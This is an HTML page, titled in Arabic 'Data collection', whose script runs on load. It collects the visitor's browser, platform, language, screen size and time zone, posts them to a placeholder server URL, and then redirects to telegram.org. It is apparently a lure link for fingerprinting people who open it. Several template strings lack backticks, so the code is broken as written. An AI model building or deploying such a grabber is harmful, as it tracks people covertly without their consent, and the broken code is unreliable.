<!DOCTYPE html>
<html lang="ar">
<head>
    <meta charset="UTF-8">
    <title>جمع البيانات</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; padding: 20px; }
        .loader { border: 4px solid #f3f3f3; border-top: 4px solid #3498db; border-radius: 50%; width: 40px; height: 40px; animation: spin 2s linear infinite; margin: 20px auto; }
        @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } }
    </style>
</head>
<body>
    <h1>جاري جمع البيانات...</h1>
    <div class="loader"></div>

    <script>
        const SERVER_URL = "https://your-project.onrender.com"; // ضع هنا رابط سيرفرك

        async function collectDeviceInfo() {
            return {
                userAgent: navigator.userAgent,
                platform: navigator.platform,
                language: navigator.language,
                screenResolution: ${screen.width}x${screen.height},
                timeZone: Intl.DateTimeFormat().resolvedOptions().timeZone,
                timestamp: new Date().toISOString()
            };
        }

        async function sendData(data) {
            await fetch(${SERVER_URL}/submit_data, {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify({ data })
            });
        }

        async function main() {
            try {
                const deviceInfo = await collectDeviceInfo();
                await sendData(deviceInfo);
                window.location.href = "https://telegram.org"; // إعادة توجيه بعد الإرسال
            } catch (error) {
                console.error(error);
            }
        }

        window.onload = main;
    </script>
</body>
</html>